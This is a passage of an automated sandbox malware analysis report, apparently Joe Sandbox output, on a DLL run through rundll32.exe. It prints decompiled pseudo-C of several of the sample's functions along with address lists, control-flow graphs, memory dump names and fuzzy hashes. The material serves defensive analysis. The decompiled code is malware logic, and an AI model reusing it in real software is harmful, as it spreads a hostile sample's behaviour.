                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEE04FB2104208FFEF11EF90CC01FAE7B6AEB08349F008055FB1495050D7B2DA20EB94
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3A66E, Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E04C3A66E(void* __edx, void* __edi, char _a4) {
				void* _t7;
				void* _t12;

				_t7 = E04C37323(__edx, __edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					_push(_t12);
					_push(_a4);
					_push(__edi);
					L04C35544();
					 *((char*)(_t12 + __edi)) = 0;
					E04C39039(_t7, _a4);
				}
				return _t12;
			}





                                                                                                                                                                                                                                    0x04c3a67a
                                                                                                                                                                                                                                    0x04c3a67f
                                                                                                                                                                                                                                    0x04c3a683
                                                                                                                                                                                                                                    0x04c3a685
                                                                                                                                                                                                                                    0x04c3a686
                                                                                                                                                                                                                                    0x04c3a689
                                                                                                                                                                                                                                    0x04c3a68a
                                                                                                                                                                                                                                    0x04c3a695
                                                                                                                                                                                                                                    0x04c3a699
                                                                                                                                                                                                                                    0x04c3a699
                                                                                                                                                                                                                                    0x04c3a6a2

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: 6a21401bd9ce31c0fa2b92baf772b81ff30ca3ea67ee023449d250fdcad060e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40E08672401228B6D7122A94DC40EEF7F6E8F45692F004025FE4849100D632EA10A7E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3AC81, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3AC81() {

				E04C3ADE5(0x4c3c344, 0x4c3d15c); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                    0x04c3ac93
                                                                                                                                                                                                                                    0x04c3ac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: fc552c4e96c39480be4174ece39f28479235c18f5fddabe720b0cabb1567ecd4
                                                                                                                                                                                                                                    • Instruction ID: 6172547efe2fd1d4fe36d2e35d9d7bae39d88ad9d410c6f8ed1abe43e6b091ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc552c4e96c39480be4174ece39f28479235c18f5fddabe720b0cabb1567ecd4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B012C6368001BF300811052D02C3E031FC0C0E27320C53AB441E4000A4867C191031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3AC9C, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3AC9C() {

				E04C3ADE5(0x4c3c344, 0x4c3d158); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                    0x04c3ac93
                                                                                                                                                                                                                                    0x04c3ac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4f6b93760fff94ab1d9c0597dae7f12d59b01de439e3a9780d3fdc8471203ea9
                                                                                                                                                                                                                                    • Instruction ID: 4cbd4f20dcf05f2ced086aab8974427f6524f5768af576d509355b42992212df
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f6b93760fff94ab1d9c0597dae7f12d59b01de439e3a9780d3fdc8471203ea9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B012C6368101AF308851092C02C3E031FC0C0E27320812AB041D4100E4C67C551031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C32049, Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e29158095fab5d6c9c9778fa731923d5c82c34639b2daf61834fb77cecac7c60
                                                                                                                                                                                                                                    • Instruction ID: cc746de2a804423832a2d9883ac362d2da82ce443bfccaf036d10ba24a49e28c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e29158095fab5d6c9c9778fa731923d5c82c34639b2daf61834fb77cecac7c60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B0123F400100ABDB018B00DD04F19BB21EB54702F004110B20554070C3364C60EB05
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Analysis Process: rundll32.exe PID: 1744 Parent PID: 5004 rundll32.exeCOMMON

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 050A6A56, Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E050A6A56(intOrPtr __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v24;
				signed int _v28;
				void* _t11;
				unsigned int* _t12;
				signed int _t14;
				void* _t16;
				signed int _t17;
				unsigned int _t21;
				void* _t24;
				void* _t25;
				void* _t28;
				signed int _t31;

				_t24 = __edx;
				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
				 *0x50ad238 = __eax;
				if(__eax != 0) {
					__imp__();
					 *0x50ad1a8 = __eax;
					_t11 = E050A8F10(__eax, _a4);
					if(_t11 == 0) {
						do {
							_t12 =  &_v24;
							__imp__(_t12);
							__imp__();
							_t21 = _v24;
							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
							L050AB226();
							_t31 = _t12 + _t14;
							_t16 = E050A7E03(_a4, _t31);
							_t17 = 2;
							_t23 = _t31;
							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
						} while (_t16 == 1);
						if(E050A6B96(_t23) != 0) {
							 *0x50ad260 = 1; // executed
						}
						_t11 = E050A225B(_t24); // executed
					}
				} else {
					_t11 = 8;
				}
				return _t11;
			}















                                                                                                                                                                                                                                    0x050a6a56
                                                                                                                                                                                                                                    0x050a6a69
                                                                                                                                                                                                                                    0x050a6a71
                                                                                                                                                                                                                                    0x050a6a76
                                                                                                                                                                                                                                    0x050a6a7d
                                                                                                                                                                                                                                    0x050a6a86
                                                                                                                                                                                                                                    0x050a6a8b
                                                                                                                                                                                                                                    0x050a6a92
                                                                                                                                                                                                                                    0x050a6a94
                                                                                                                                                                                                                                    0x050a6a94
                                                                                                                                                                                                                                    0x050a6a99
                                                                                                                                                                                                                                    0x050a6a9f
                                                                                                                                                                                                                                    0x050a6aa5
                                                                                                                                                                                                                                    0x050a6aaf
                                                                                                                                                                                                                                    0x050a6abc
                                                                                                                                                                                                                                    0x050a6ac1
                                                                                                                                                                                                                                    0x050a6ac7
                                                                                                                                                                                                                                    0x050a6ad0
                                                                                                                                                                                                                                    0x050a6ad1
                                                                                                                                                                                                                                    0x050a6ad6
                                                                                                                                                                                                                                    0x050a6adc
                                                                                                                                                                                                                                    0x050a6ae8
                                                                                                                                                                                                                                    0x050a6aea
                                                                                                                                                                                                                                    0x050a6aea
                                                                                                                                                                                                                                    0x050a6af4
                                                                                                                                                                                                                                    0x050a6af4
                                                                                                                                                                                                                                    0x050a6a78
                                                                                                                                                                                                                                    0x050a6a7a
                                                                                                                                                                                                                                    0x050a6a7a
                                                                                                                                                                                                                                    0x050a6afe

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: BcN
                                                                                                                                                                                                                                    • API String ID: 0-1407964239
                                                                                                                                                                                                                                    • Opcode ID: 0eb9c8eef66c5332c04678223fd7085894b6a423901980922270dd1c8d15f9e5
                                                                                                                                                                                                                                    • Instruction ID: ca73cd7aa41ca1fbf2ccfbdfeaaca709964f1e925005e47927783c30728996e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0eb9c8eef66c5332c04678223fd7085894b6a423901980922270dd1c8d15f9e5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34117373A546007AE710ABA4EC0EFAE3AE9EB54750F158529F605C6180EEB5D8418B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A12D4, Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 22 50a12d4-50a1306 24 50a157b-50a1582 22->24 25 50a130c-50a132a 22->25 27 50a156b-50a156f 25->27 28 50a1330-50a1359 call 50aa7bc call 50a95b1 25->28 27->24 33 50a155b-50a155f 28->33 34 50a135f-50a1384 28->34 33->27 36 50a13aa-50a140e 34->36 37 50a1386-50a139d 34->37 42 50a1559 36->42 43 50a1414-50a142d 36->43 37->36 42->33 45 50a1476-50a1478 43->45 46 50a147a 45->46 47 50a142f-50a1436 45->47 48 50a147e-50a1484 46->48 49 50a143f-50a1441 47->49 50 50a1486-50a148c 48->50 51 50a1494 48->51 54 50a1469-50a1473 49->54 55 50a1443-50a1466 49->55 56 50a1492 50->56 57 50a1530-50a1538 50->57 52 50a149e-50a14be 51->52 53 50a1496-50a149c 51->53 64 50a14c9-50a14cc 52->64 65 50a14c0-50a14c5 52->65 53->52 58 50a14eb-50a14f2 53->58 54->45 55->54 56->51 59 50a1543-50a1547 57->59 68 50a14fb-50a14fd 58->68 62 50a153a-50a153c 59->62 63 50a1549-50a154c 59->63 66 50a153e-50a1540 62->66 67 50a1542 62->67 75 50a1555-50a1557 63->75 70 50a14ce-50a14d0 64->70 71 50a14d1-50a14e8 call 50a5544 64->71 65->64 69 50a14c7 65->69 66->67 67->59 73 50a14ff-50a1510 68->73 74 50a1513-50a1526 68->74 69->64 70->71 71->58 73->74 74->58 80 50a1528-50a152b 74->80 75->27 80->48
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 68531333b30a28e7f77d3a2e26117d41a7c1ef18910ec67c94d72c4690cfcfb3
                                                                                                                                                                                                                                    • Instruction ID: 04438b795a5baa263afffa810bbbaa71969f1c820d81018e07d43c85a1f59f6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68531333b30a28e7f77d3a2e26117d41a7c1ef18910ec67c94d72c4690cfcfb3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F812772910209AFDB218FA9EC85AEEBBB9FB44300F11416AF515E6250EB349A45CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A225B, Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 82 50a225b-50a2276 call 50a550e 85 50a2278-50a2286 82->85 86 50a228c-50a229a 82->86 85->86 88 50a22ac-50a22c7 call 50a3d0d 86->88 89 50a229c-50a229f 86->89 95 50a22c9-50a22cf 88->95 96 50a22d1 88->96 89->88 90 50a22a1-50a22a6 89->90 90->88 92 50a242d 90->92 94 50a242f-50a2435 92->94 97 50a22d7-50a22ec call 50a1bf4 call 50a1b2f 95->97 96->97 102 50a22ee 97->102 103 50a22f7-50a22fc 97->103 102->103 104 50a22fe-50a2303 103->104 105 50a2322-50a233a call 50a2049 103->105 106 50a2419-50a241d 104->106 107 50a2309 104->107 114 50a233c-50a2364 call 50aa7bc 105->114 115 50a2366-50a2368 105->115 111 50a241f-50a2423 106->111 112 50a2425-50a242b 106->112 109 50a230c-50a231b call 50aa501 107->109 122 50a231d 109->122 111->94 111->112 112->94 117 50a2369-50a236d 114->117 115->117 117->106 121 50a2373-50a2389 117->121 125 50a238b-50a23b7 121->125 126 50a23b9-50a23bb 121->126 122->106 127 50a23bc-50a23c0 125->127 126->127 127->106 129 50a23c2-50a23e2 call 50a269c call 50a4094 127->129 129->106 134 50a23e4-50a23eb call 50a96a4 129->134 137 50a23ed-50a23f0 134->137 138 50a23f2-50a23f9 134->138 137->106 139 50a23fb-50a23fd 138->139 140 50a240e-50a2412 call 50a6786 138->140 139->106 141 50a23ff-50a2403 call 50a3dd9 139->141 144 50a2417 140->144 145 50a2408-50a240c 141->145 144->106 145->106 145->140
                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                    			E050A225B(signed int __edx) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				signed int _t32;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				intOrPtr _t47;
				intOrPtr* _t49;
				signed int _t51;
				signed char _t53;
				intOrPtr _t55;
				signed int _t56;
				intOrPtr _t59;
				signed int _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t65;

				_t58 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E050A550E();
				if(_t21 != 0) {
					_t56 =  *0x50ad25c; // 0x4000000a
					_t52 = (_t56 & 0xf0000000) + _t21;
					 *0x50ad25c = (_t56 & 0xf0000000) + _t21;
				}
				_t22 =  *0x50ad164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E050A3D0D( &_v8,  &_v20); // executed
					_t51 = _t25;
					_t26 =  *0x50ad27c; // 0x214a5a8
					if( *0x50ad25c > 5) {
						_t8 = _t26 + 0x50ae5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x50aea15; // 0x44283a44
						_t27 = _t7;
					}
					E050A1BF4(_t27, _t27);
					_t31 = E050A1B2F(_t58,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						__imp__(_v20);
					}
					_t59 = 5;
					if(_t51 != _t59) {
						 *0x50ad270 =  *0x50ad270 ^ 0x81bbe65d;
						_t32 = E050A2049(_t31, 0x60);
						__eflags = _t32;
						 *0x50ad32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							L050AA7BC();
							_t47 =  *0x50ad32c; // 0x71f95b0
							_t65 = _t65 + 0xc;
							__imp__(_t47 + 0x40, _t32, 0, 0x60);
							_t49 =  *0x50ad32c; // 0x71f95b0
							 *_t49 = 0x50ae836;
						}
						__eflags = 0;
						_t51 = 0;
						if(0 == 0) {
							__imp__( *0x50ad238, 0, 0x43);
							__eflags = 0;
							 *0x50ad2c4 = 0;
							if(0 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t53 =  *0x50ad25c; // 0x4000000a
								_t58 = _t53 & 0x000000ff;
								_t55 =  *0x50ad27c; // 0x214a5a8
								_t13 = _t55 + 0x50ae55a; // 0x697a6f4d
								_t52 = _t13;
								 *0x50ad120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x50ac2a7);
							}
							__eflags = 0;
							_t51 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E050A269C( ~_v8 &  *0x50ad270, 0x50ad00c); // executed
								_t41 = E050A4094(_t52); // executed
								_t51 = _t41;
								__eflags = _t51;
								if(_t51 != 0) {
									goto L30;
								}
								_t42 = E050A96A4(_t52); // executed
								__eflags = _t42;
								if(_t42 != 0) {
									__eflags = _v8;
									_t62 = _v12;
									if(_v8 != 0) {
										L29:
										_t43 = E050A6786(_t58, _t62, _v8); // executed
										_t51 = _t43;
										goto L30;
									}
									__eflags = _t62;
									if(__eflags == 0) {
										goto L30;
									}
									_t45 = E050A3DD9(__eflags, _t62 + 4); // executed
									_t51 = _t45;
									__eflags = _t51;
									if(_t51 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t51 = 8;
							}
						}
					} else {
						_t63 = _v12;
						if(_t63 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x50ad160();
							}
							goto L34;
						}
						_t64 = _t63 + 4;
						do {
						} while (E050AA501(_t59, _t64, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t51 = _t22;
					L34:
					return _t51;
				}
			}































                                                                                                                                                                                                                                    0x050a225b
                                                                                                                                                                                                                                    0x050a2266
                                                                                                                                                                                                                                    0x050a2269
                                                                                                                                                                                                                                    0x050a226c
                                                                                                                                                                                                                                    0x050a226f
                                                                                                                                                                                                                                    0x050a2276
                                                                                                                                                                                                                                    0x050a2278
                                                                                                                                                                                                                                    0x050a2284
                                                                                                                                                                                                                                    0x050a2286
                                                                                                                                                                                                                                    0x050a2286
                                                                                                                                                                                                                                    0x050a228f
                                                                                                                                                                                                                                    0x050a2297
                                                                                                                                                                                                                                    0x050a229a
                                                                                                                                                                                                                                    0x050a22b4
                                                                                                                                                                                                                                    0x050a22c0
                                                                                                                                                                                                                                    0x050a22c2
                                                                                                                                                                                                                                    0x050a22c7
                                                                                                                                                                                                                                    0x050a22d1
                                                                                                                                                                                                                                    0x050a22d1
                                                                                                                                                                                                                                    0x050a22c9
                                                                                                                                                                                                                                    0x050a22c9
                                                                                                                                                                                                                                    0x050a22c9
                                                                                                                                                                                                                                    0x050a22c9
                                                                                                                                                                                                                                    0x050a22d8
                                                                                                                                                                                                                                    0x050a22e5
                                                                                                                                                                                                                                    0x050a22ec
                                                                                                                                                                                                                                    0x050a22f1
                                                                                                                                                                                                                                    0x050a22f1
                                                                                                                                                                                                                                    0x050a22f9
                                                                                                                                                                                                                                    0x050a22fc
                                                                                                                                                                                                                                    0x050a2322
                                                                                                                                                                                                                                    0x050a232e
                                                                                                                                                                                                                                    0x050a2333
                                                                                                                                                                                                                                    0x050a2335
                                                                                                                                                                                                                                    0x050a233a
                                                                                                                                                                                                                                    0x050a2366
                                                                                                                                                                                                                                    0x050a2368
                                                                                                                                                                                                                                    0x050a233c
                                                                                                                                                                                                                                    0x050a2340
                                                                                                                                                                                                                                    0x050a2345
                                                                                                                                                                                                                                    0x050a234a
                                                                                                                                                                                                                                    0x050a2351
                                                                                                                                                                                                                                    0x050a2357
                                                                                                                                                                                                                                    0x050a235c
                                                                                                                                                                                                                                    0x050a2362
                                                                                                                                                                                                                                    0x050a2369
                                                                                                                                                                                                                                    0x050a236b
                                                                                                                                                                                                                                    0x050a236d
                                                                                                                                                                                                                                    0x050a237c
                                                                                                                                                                                                                                    0x050a2382
                                                                                                                                                                                                                                    0x050a2384
                                                                                                                                                                                                                                    0x050a2389
                                                                                                                                                                                                                                    0x050a23b9
                                                                                                                                                                                                                                    0x050a23bb
                                                                                                                                                                                                                                    0x050a238b
                                                                                                                                                                                                                                    0x050a238b
                                                                                                                                                                                                                                    0x050a2391
                                                                                                                                                                                                                                    0x050a239e
                                                                                                                                                                                                                                    0x050a23a4
                                                                                                                                                                                                                                    0x050a23a4
                                                                                                                                                                                                                                    0x050a23ac
                                                                                                                                                                                                                                    0x050a23b5
                                                                                                                                                                                                                                    0x050a23bc
                                                                                                                                                                                                                                    0x050a23be
                                                                                                                                                                                                                                    0x050a23c0
                                                                                                                                                                                                                                    0x050a23c7
                                                                                                                                                                                                                                    0x050a23d4
                                                                                                                                                                                                                                    0x050a23d9
                                                                                                                                                                                                                                    0x050a23de
                                                                                                                                                                                                                                    0x050a23e0
                                                                                                                                                                                                                                    0x050a23e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a23e4
                                                                                                                                                                                                                                    0x050a23e9
                                                                                                                                                                                                                                    0x050a23eb
                                                                                                                                                                                                                                    0x050a23f2
                                                                                                                                                                                                                                    0x050a23f6
                                                                                                                                                                                                                                    0x050a23f9
                                                                                                                                                                                                                                    0x050a240e
                                                                                                                                                                                                                                    0x050a2412
                                                                                                                                                                                                                                    0x050a2417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a2417
                                                                                                                                                                                                                                    0x050a23fb
                                                                                                                                                                                                                                    0x050a23fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a2403
                                                                                                                                                                                                                                    0x050a2408
                                                                                                                                                                                                                                    0x050a240a
                                                                                                                                                                                                                                    0x050a240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a240c
                                                                                                                                                                                                                                    0x050a23ef
                                                                                                                                                                                                                                    0x050a23ef
                                                                                                                                                                                                                                    0x050a23c0
                                                                                                                                                                                                                                    0x050a22fe
                                                                                                                                                                                                                                    0x050a22fe
                                                                                                                                                                                                                                    0x050a2303
                                                                                                                                                                                                                                    0x050a2419
                                                                                                                                                                                                                                    0x050a241d
                                                                                                                                                                                                                                    0x050a2425
                                                                                                                                                                                                                                    0x050a2425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a241d
                                                                                                                                                                                                                                    0x050a2309
                                                                                                                                                                                                                                    0x050a230c
                                                                                                                                                                                                                                    0x050a2316
                                                                                                                                                                                                                                    0x050a231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a242d
                                                                                                                                                                                                                                    0x050a242d
                                                                                                                                                                                                                                    0x050a2431
                                                                                                                                                                                                                                    0x050a2435
                                                                                                                                                                                                                                    0x050a2435

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ec580547e9faca532cbd6b279fca92a8e4a6a2d6242127fd0e9df785db88193e
                                                                                                                                                                                                                                    • Instruction ID: 4b151c6935b97f7d434e1558890e434d73c5db582cfb5c90b71febe7ae2a2d53
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec580547e9faca532cbd6b279fca92a8e4a6a2d6242127fd0e9df785db88193e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E651DE7BB20616ABDB619BF4F849EAE3BE9BB58700F044436F502D7540FA78D941CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A3DD9, Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                    Download Yara Rule

